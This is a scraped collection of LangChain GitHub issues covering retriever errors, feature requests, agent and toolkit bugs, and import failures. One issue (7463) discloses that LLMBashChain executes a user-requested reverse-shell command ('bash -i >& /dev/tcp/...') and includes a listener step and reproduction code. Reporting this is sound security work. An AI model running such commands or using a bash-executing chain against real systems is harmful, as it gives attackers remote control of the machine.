- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code is very similar to existing example, instead of ``` Pinecone.from_documents``` I use ```Pinecone.from_documents.from_existingindex```
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
metadata_field_info = [
AttributeInfo(
name="IdentityId",
description="The id of the resident",
type="string",
),
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string"
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident",
type="string"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident",
type="string"
),
AttributeInfo(
name="Hometown",
description="The hometown of the resident",
type="string"
)
]
document_content_description = "General information about the resident for example: Phone number, Cell phone number, address, birth date, owned technologies, more about me, edication, college name, past occupations, past interests, whether is veteran or not, name of spourse, religious preferences, spoken languages, active live description, retired live description, accomplishments, marital status, anniversay date, his/her typical day, talents and hobbies, interest categories, other interest categories, favorite actor, favorite actress, etc"
llm = OpenAI(temperature=0)
vectordb = Pinecone.from_existing_index("default",embedding=embed, namespace="profiles5")
retriever = SelfQueryRetriever.from_llm(
llm, vectordb, document_content_description, metadata_field_info, verbose=True
)
qa_chain = RetrievalQA.from_chain_type(llm,retriever=retriever)
response = qa_chain.run(user_input)
st.write(response)
```
Error:
TypeError: 'NoneType' object is not callable
Traceback:
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 151, in <module>
main()
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 142, in main
retriever = SelfQueryRetriever.from_llm(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\retrievers\self_query\base.py", line 149, in from_llm
llm_chain = load_query_constructor_chain(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 142, in load_query_constructor_chain
prompt = _get_prompt(
^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 103, in _get_prompt
output_parser = StructuredQueryOutputParser.from_components(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 60, in from_components
ast_parser = get_parser(
^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\parser.py", line 148, in get_parser
transformer = QueryTransformer(
### Expected behavior
response to the query should be returned. | TypeError: 'NoneType' object is not callable in SelfQueryRetriever.from_llm | https://api.github.com/repos/langchain-ai/langchain/issues/7468/comments | 3 | 2023-07-10T08:33:10Z | 2023-07-10T13:36:01Z | https://github.com/langchain-ai/langchain/issues/7468 | 1,796,263,402 | 7,468 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I am using pgvector and hoping for an MMR retrieval method similar to qdrant implementation.
### Motivation
MMR retrieval can return more diverse results, removing duplicate rows, which meets my needs (I did some testing on qdrant). However, I couldn't find an implementation in vectorstore of type pgvector.
### Your contribution
I found that in the current implementation of the pgvector class, the retrieval results do not return the original vectors, so it is not possible to simply add MMR post-processing. Is this due to performance considerations? Have you considered adding an option for this? | pgvector add implemention of MMR | https://api.github.com/repos/langchain-ai/langchain/issues/7466/comments | 3 | 2023-07-10T08:08:26Z | 2023-11-28T16:16:39Z | https://github.com/langchain-ai/langchain/issues/7466 | 1,796,222,961 | 7,466 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
LangChain version v0.0.228
Linux * 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Python 3.9.13
```
### Who can help?
@hwchase17
@agola11
@coyotespike
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduce with these steps:
1. `nv -lvp 4444` : Open your 4444 port.
2. Run the below code.
```python
from langchain.chains import LLMBashChain
from langchain.llms import OpenAI
llm = OpenAI(temperature=0)
text = "Please write a bash script that executes `bash -c 'bash -i >& /dev/tcp/0.0.0.0/4444 0>&1'`"
bash_chain = LLMBashChain.from_llm(llm, verbose=True)
bash_chain.run(text)
```
3. You can get the reverse shell code.
### Expected behavior
Bash chain is so vulnerable. I think that it should print some warning messages or block the execution. But it just execute my script. This chain is so dangerous to use in production, isn't it? | BashChain allows Remote Control Execution. | https://api.github.com/repos/langchain-ai/langchain/issues/7463/comments | 1 | 2023-07-10T06:43:43Z | 2023-10-16T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7463 | 1,796,085,216 | 7,463 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.208 python==3.10.12 linux==Ubuntu 20.04.6 LTS
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.llms import OpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationBufferMemory
llm = OpenAI(model="text-davinci-003", temperature=0)
conversation = ConversationChain(
llm=llm,
verbose=True,
memory=ConversationBufferMemory()
)
# Start the conversation
conversation.predict(input="Tell me about yourself.")
# Continue the conversation
conversation.predict(input="What can you do?")
conversation.predict(input="How can you help me with data analysis?")
# Display the conversation
print(conversation)
### Expected behavior
OpenAI would use env variable for openai_api_key and not allow ConversationChain to leak it via memory=ConversationBufferMemory() | openai_api_key stored as string | https://api.github.com/repos/langchain-ai/langchain/issues/7462/comments | 2 | 2023-07-10T06:32:59Z | 2023-10-16T16:05:39Z | https://github.com/langchain-ai/langchain/issues/7462 | 1,796,067,285 | 7,462 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hello every one!
Im triying to use an LLM models to consult data from OpenTargetPlatform (theyive information about disaeses and its bond with some molecules etc). They have and endpoint which can be access using Graph QL. OpenTargetPlatform have several query structures for different kind of data requests. In the following example I give to the model 3 different query structures:
```python
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType, Tool
from langchain.utilities import GraphQLAPIWrapper
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
# 1.1) Promt Template (in case we need to make a prompt engineering)
prompt = PromptTemplate(
input_variables=["query"],
template="{query}"
)
# 1.2) LLM Model , in this case a LLM modelo from OpenAI
llm = OpenAI(openai_api_key="YOURKEY",
model_name="gpt-3.5-turbo", temperature=0.85)
# 1.3) Creation of the chain object (integrates the llm and the prompt template)
llm_chain = LLMChain(llm=llm, prompt=prompt)
# 2.1) We set up the LLM as a tool in order to answer general questions
llm_tool = Tool(name='Language Model',
func=llm_chain.run,
description='use this tool for general purpose queries and logic')
# 2.2) We set up the graphql tool
graph_tool = load_tools( # IMPORTANT: usamos load_tools porque ya es una herramienta interna de Langchaing
tool_names = ["graphql"],
graphql_endpoint="https://api.platform.opentargets.org/api/v4/graphql",
llm=llm)
# 2.3) List of tools that the agent will take
tools = [llm_tool, graph_tool[0]]
agent = initialize_agent(
agent="zero-shot-react-description", # Type of agent
tools=tools, # herramienta que le doy
llm=llm,
verbose=True,
max_iterations=3)
# IMPORANT: The zero shot react agent has no memory, all the answers that it will give are just for one question. It case you want to use a agent with memoory you have to use other type of agent such as Conversational React
type(agent)
prefix = "This questions are related to get medical information, specifically data from OpenTargetPlatform, " \
"If the question is about the relation among a target and a diseases use the query TargetDiseases, " \
"If the question is about the relation among diseases and targets then use the query DiseasesTargets, " \
"If the question request evidence between a disease and targets then use the query targetDiseaseEvidence"
graphql_fields = """
query TargetDiseases {
target(ensemblId: "target") {
id
approvedSymbol
associatedDiseases {
count
rows {
disease {
id
name
}
datasourceScores {
id
score
}
}
}
}
}
query DiseasesTargets {
disease(efoId: "disease") {
id
name
associatedTargets {
count
rows {
target {
id
approvedSymbol
}
score
}
}
}
}
query targetDiseaseEvidence {
disease(efoId: "disease") {
id
name
evidences(datasourceIds: ["intogen"], ensemblIds: ["target"]) {
count
rows {
disease {
id
name
}
diseaseFromSource
target {
id
approvedSymbol
}
mutatedSamples {
functionalConsequence {
id
label
}
numberSamplesTested
numberMutatedSamples
}
resourceScore
significantDriverMethods
cohortId
cohortShortName
cohortDescription
}
}
}
}
"""
suffix = "What are the targets of vorinostat?"
#answer= agent.run(prefix+ suffix + graphql_fields)
answer= agent.run(suffix + prefix+ graphql_fields)
answer
```
When I have 2 structures of queries it works well. However, when I add the thid like in this examples different kinf of errors start to show.
Any recomentation about this? shoul I separete the query structure? or the order of elements is wrong in my agent ?
I would apreciate so much your help !
Orlando
### Suggestion:
_No response_ | Help using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7459/comments | 1 | 2023-07-10T05:22:54Z | 2023-10-16T16:05:45Z | https://github.com/langchain-ai/langchain/issues/7459 | 1,795,972,865 | 7,459 |
[
"hwchase17",
"langchain"
]
| Hi there,
I am new to langchain and I encountered some problems when import `langchain.agents`.
I run `main.py` as follows:
```python
# main.py
# python main.py
import os
os.environ["OPENAI_API_KEY"]="my key"
import langchain.agents
```
Some errors occur:
```
Traceback (most recent call last):
File "F:\LLM_publichousing\me\main.py", line 6, in <module>
import langchain.agents
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\__init__.py", line 54, in <module>
from langchain.document_loaders.github import GitHubIssuesLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\github.py", line 37, in <module>
class GitHubIssuesLoader(BaseGitHubLoader):
File "pydantic\main.py", line 197, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 506, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 663, in pydantic.fields.ModelField._type_analysis
File "pydantic\fields.py", line 808, in pydantic.fields.ModelField._create_sub_type
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 668, in pydantic.fields.ModelField._type_analysis
File "C:\ProgramData\Anaconda3\envs\ly\lib\typing.py", line 852, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
```
The langchain version is `0.0.228`
My system is Windows 10. | Error occurs when `import langchain.agents` | https://api.github.com/repos/langchain-ai/langchain/issues/7458/comments | 6 | 2023-07-10T04:43:44Z | 2023-10-21T16:07:20Z | https://github.com/langchain-ai/langchain/issues/7458 | 1,795,933,159 | 7,458 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
python 3.11.1
LLM: self hosting llm using [text-generation-inference](https://github.com/huggingface/text-generation-inference)
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
There is a Sample Input in the description for `InfoSQLDatabaseTool` ([this line](https://github.com/hwchase17/langchain/blob/560c4dfc98287da1bc0cfc1caebbe86d1e66a94d/langchain/agents/agent_toolkits/sql/toolkit.py#L48C18-L48C18)), and the Sample Input quotes all table names in a pair of single quotes, which will mislead the llm to also quote Action Input in single quotes.
An example of the LLM behaviour:
```console
$ agent_executor.run("According to the titanic table, how many people survived?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table seems relevant, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
Thought:I should list all the tables in the database first.
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table is in the database, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
```
And this example is more clear (note the Action Input):
```console
$ agent_executor.run("When is the last dataset created?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The 'dataset' and 'dataset_version' tables seem relevant. I should query the schema for these tables.
Action: sql_db_schema
Action Input: 'dataset, dataset_version'
Observation: Error: table_names {"dataset_version'", "'dataset"} not found in database
```
After removing the quotes around the Example Input the SQL Agent works fine now.
### Expected behavior
The Action Input of `InfoSQLDatabaseTool` should be a list of table names, not a quoted str. | The single quote in Example Input of SQLDatabaseToolkit will mislead LLM | https://api.github.com/repos/langchain-ai/langchain/issues/7457/comments | 16 | 2023-07-10T04:17:49Z | 2024-02-14T16:13:03Z | https://github.com/langchain-ai/langchain/issues/7457 | 1,795,907,276 | 7,457 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.195
python==3.9.17
system-info==ubuntu
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Copy paste this code:
```
async def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = await agent.arun(question)
return answer
response = await csv_qa("question_about_csv")
```
### Expected behavior
Will return the same response as using `run`:
```
def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = agent.run(question)
return answer
response = csv_qa("question_about_csv")
``` | Getting ` NotImplementedError: PythonReplTool does not support async` when trying to use `arun` on CSV agent | https://api.github.com/repos/langchain-ai/langchain/issues/7455/comments | 3 | 2023-07-10T02:48:11Z | 2024-02-14T16:13:08Z | https://github.com/langchain-ai/langchain/issues/7455 | 1,795,819,951 | 7,455 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain: 0.0.208
platform: win 10
python: 3.9.
The warning message is :
'Created a chunk of size 374, which is longer than the specified 100'.
### Who can help?
@hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**Step1: run the code snippets below:**
from langchain.document_loaders import TextLoader
from langchain.text_splitter import CharacterTextSplitter
text = '''
Google opens up its AI language model PaLM to challenge OpenAI and GPT-3
Google is offering developers access to one of its most advanced AI language models: PaLM.
The search giant is launching an API for PaLM alongside a number of AI enterprise tools
it says will help businesses “generate text, images, code, videos, audio, and more from
simple natural language prompts.”
PaLM is a large language model, or LLM, similar to the GPT series created by OpenAI or
Meta’s LLaMA family of models. Google first announced PaLM in April 2022. Like other LLMs,
PaLM is a flexible system that can potentially carry out all sorts of text generation and
editing tasks. You could train PaLM to be a conversational chatbot like ChatGPT, for
example, or you could use it for tasks like summarizing text or even writing code.
(It’s similar to features Google also announced today for its Workspace apps like Google
Docs and Gmail.)'''
with open('test.txt','w') as f:
f.write(text)
#
loader = TextLoader('test.txt')
docs_from_file = loader.load()
print(docs_from_file)
text_splitter1 = CharacterTextSplitter(chunk_size=100,chunk_overlap=20)
docs = text_splitter1.split_documents(docs_from_file)
print(docs)
print(len(docs))
Step 2: then it cannot split the text as expected
### Expected behavior
It should split the doc as expected size as chunk_size. | 'chunk_size' doesnt work on 'split_documents' function | https://api.github.com/repos/langchain-ai/langchain/issues/7452/comments | 2 | 2023-07-10T00:33:09Z | 2023-07-13T00:41:21Z | https://github.com/langchain-ai/langchain/issues/7452 | 1,795,665,180 | 7,452 |
[
"hwchase17",
"langchain"
]
| Adding a unit test for any experimental module in the standard location, such as `tests/unit_tests/experimental/test_baby_agi.py`, leads to this failing unit test:
```python
../tests/unit_tests/output_parsers/test_base_output_parser.py ...................................F
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> traceback >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def test_all_subclasses_implement_unique_type() -> None:
types = defaultdict(list)
for cls in _NON_ABSTRACT_PARSERS:
try:
types[cls._type].append(cls.__name__)
except NotImplementedError:
# This is handled in the previous test
pass
dups = {t: names for t, names in types.items() if len(names) > 1}
> assert not dups, f"Duplicate types: {dups}"
E AssertionError: Duplicate types: {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOutputParser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
E assert not {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOu...arser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
../tests/unit_tests/output_parsers/test_base_output_parser.py:55: AssertionError
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> entering PDB >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PDB post_mortem >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> /workspaces/tests/unit_tests/output_parsers/test_base_output_parser.py(55)test_all_subclasses_implement_unique_type()
-> assert not dups, f"Duplicate types: {dups}"
```
[Repro is here](https://github.com/borisdev/langchain/pull/12) and [artifact here](https://github.com/borisdev/langchain/actions/runs/5502599425/jobs/10026958854?pr=12).
| Issue: Unable to add a unit test for experimental modules | https://api.github.com/repos/langchain-ai/langchain/issues/7451/comments | 5 | 2023-07-10T00:09:26Z | 2023-10-10T17:06:29Z | https://github.com/langchain-ai/langchain/issues/7451 | 1,795,646,919 | 7,451 |
[
"hwchase17",
"langchain"
]
| ### System Info
lanchain: latest, python 3.10.10
This script writes the content to the file initially, but there is a flawed step when closing the file. I've extracted this log to show the issue. For some reason, the agent thinks that if it submits an empty text input with append set to false, the previous contents will remain, but this is a false assumption. The agent should set `append:true` to ensure the file contents are preserved. The result is that the file is written with the contents and then the contents are deleted during this step.
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```
from dotenv import find_dotenv, load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.experimental.plan_and_execute import PlanAndExecute, load_agent_executor, load_chat_planner
from langchain.agents.tools import Tool
from helpers import project_root
from langchain.agents.agent_toolkits import FileManagementToolkit
from tempfile import TemporaryDirectory
load_dotenv(find_dotenv())
OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]
model=ChatOpenAI(temperature=0, model="gpt-3.5-turbo")
tools = FileManagementToolkit(
root_dir=str(project_root('scratch')),
selected_tools=["read_file", "write_file", "list_directory"]).get_tools()
read_tool, write_tool, list_tool = tools
planner = load_chat_planner(model)
executor = load_agent_executor(model, tools, verbose=True)
agent = PlanAndExecute(planner=planner, executor=executor, verbose=True)
agent.run("Write a short haiku about the ocean and save it to file 'hello.txt'")
```
Output:
> Entering new chain...
steps=[Step(value='Create a string variable to store the haiku about the ocean.'), Step(value="Open a file named 'hello.txt' in write mode."), Step(value='Write the haiku to the file.'), Step(value='Close the file.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")]
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "ocean_haiku = 'Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines'"
}
```
> Finished chain.
*****
Step: Create a string variable to store the haiku about the ocean.
Response: ocean_haiku = 'Waves crash on the shore
Seagulls soar in the blue sky
Ocean's beauty shines'
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": ""
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the file was successfully opened in write mode, I can now proceed to write the haiku about the ocean to the file.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines"
}
}
```
Observation: File written successfully to hello.txt.
Thought:The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Finished chain.
*****
Step: Open a file named 'hello.txt' in write mode.
Response: The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines",
"append": true
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Finished chain.
*****
Step: Write the haiku to the file.
Response: Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
*****
Step: Close the file.
Response: The file "hello.txt" has been successfully closed.
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "The haiku about the ocean has been successfully written to the file 'hello.txt'."
}
```
> Finished chain.
### Expected behavior
I would expect the file to be populated with the haiku instead of being empty. | write_tool logic is off | https://api.github.com/repos/langchain-ai/langchain/issues/7450/comments | 2 | 2023-07-09T23:18:56Z | 2023-10-16T16:05:54Z | https://github.com/langchain-ai/langchain/issues/7450 | 1,795,626,027 | 7,450 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
We shouldn't have to sign up for another API just to follow the quickstart tutorial. Please replace this with something that doesn't require sign-up.
### Idea or request for content:
Proposal: Use `http://api.duckduckgo.com/?q=x&format=json`
Example:
`http://api.duckduckgo.com/?q=langchain&format=json`
`{"Abstract":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractSource":"Wikipedia","AbstractText":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractURL":"https://en.wikipedia.org/wiki/LangChain","Answer":"","AnswerType":"","Definition":"","DefinitionSource":"","DefinitionURL":"","Entity":"software","Heading":"LangChain","Image":"/i/d6fad29d.png","ImageHeight":270,"ImageIsLogo":1,"ImageWidth":529,"Infobox":{"content":[{"data_type":"string","label":"Developer(s)","value":"Harrison Chase","wiki_order":0},{"data_type":"string","label":"Initial release","value":"October 2022","wiki_order":1},{"data_type":"string","label":"Repository","value":"github.com/hwchase17/langchain","wiki_order":2},{"data_type":"string","label":"Written in","value":"Python and JavaScript","wiki_order":3},{"data_type":"string","label":"Type","value":"Software framework for large language model application development","wiki_order":4},{"data_type":"string","label":"License","value":"MIT License","wiki_order":5},{"data_type":"string","label":"Website","value":"LangChain.com","wiki_order":6},{"data_type":"twitter_profile","label":"Twitter profile","value":"langchainai","wiki_order":"102"},{"data_type":"instance","label":"Instance of","value":{"entity-type":"item","id":"Q7397","numeric-id":7397},"wiki_order":"207"},{"data_type":"official_website","label":"Official Website","value":"https://langchain.com/","wiki_order":"208"}],"meta":[{"data_type":"string","label":"article_title","value":"LangChain"},{"data_type":"string","label":"template_name","value":"infobox software"}]},"Redirect":"","RelatedTopics":[{"FirstURL":"https://duckduckgo.com/c/Software_frameworks","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Software_frameworks\">Software frameworks</a>","Text":"Software frameworks"},{"FirstURL":"https://duckduckgo.com/c/Artificial_intelligence","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Artificial_intelligence\">Artificial intelligence</a>","Text":"Artificial intelligence"}],"Results":[{"FirstURL":"https://langchain.com/","Icon":{"Height":16,"URL":"/i/langchain.com.ico","Width":16},"Result":"<a href=\"https://langchain.com/\"><b>Official site</b></a><a href=\"https://langchain.com/\"></a>","Text":"Official site"}],"Type":"A","meta":{"attribution":null,"blockgroup":null,"created_date":null,"description":"Wikipedia","designer":null,"dev_date":null,"dev_milestone":"live","developer":[{"name":"DDG Team","type":"ddg","url":"http://www.duckduckhack.com"}],"example_query":"nikola 